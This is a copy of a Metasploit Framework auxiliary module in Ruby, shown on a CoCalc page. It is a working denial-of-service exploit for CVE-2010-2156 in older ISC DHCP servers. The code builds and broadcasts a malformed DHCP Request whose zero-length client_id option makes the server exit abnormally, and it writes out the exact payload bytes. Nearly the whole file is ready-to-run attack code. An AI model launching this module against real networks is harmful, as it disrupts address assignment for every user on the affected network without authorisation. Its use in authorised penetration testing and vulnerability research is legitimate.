CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Dos

8
  include Msf::Exploit::Capture

9


10
  def initialize

11
    super(

12
      'Name'          => 'ISC DHCP Zero Length ClientID Denial of Service Module',

13
      'Description'   => %q{

14
          This module performs a Denial of Service Attack against the ISC DHCP server,

15
        versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request

16
        message with a 0-length client_id option for an IP address on the appropriate range

17
        for the dhcp server. When ISC DHCP Server tries to hash this value it exits

18
        abnormally.

19
      },

20
      'Author'        =>

21
          [

22
            'sid', # Original POC

23
            'theLightCosine' # msf module

24
          ],

25
      'License'       => MSF_LICENSE,

26
      'References'    =>

27
        [

28
          [ 'CVE', '2010-2156' ],

29
          [ 'OSVDB', '65246'],

30
          [ 'EDB', '14185']

31
        ]

32
    )

33
    register_options(

34
      [

35
        OptAddress.new('RIP', [true, 'A valid IP to request from the server'])

36
      ]

37
    )

38
    deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')

39
  end

40


41
  def run

42
    open_pcap

43
    print_status("Creating DHCP Request with 0-length ClientID")

44
    p = PacketFu::UDPPacket.new

45
    p.ip_daddr = "255.255.255.255"

46
    p.udp_sport = 68

47
    p.udp_dport = 67

48


49
    # TODO: Get a DHCP parser into PacketFu

50
    chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"

51
    dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"

52
    p.payload = dhcp_req(chaddr,dhcp_payload)

53
    p.recalc

54
    print_status("Sending malformed DHCP request...")

55
    capture_sendto(p, '255.255.255.255')

56
    close_pcap

57
  end

58


59
  def dhcp_req(chaddr,payload)

60
    req = "\x00" * 236

61
    req[0,3] = "\x01\x01\x06" # Boot request on Eth with hw len of 6

62
    req[12,4] = Rex::Socket.addr_aton(datastore['RIP'])

63
    req[28,6] = chaddr

64
    req + payload

65
  end

66
end

67


68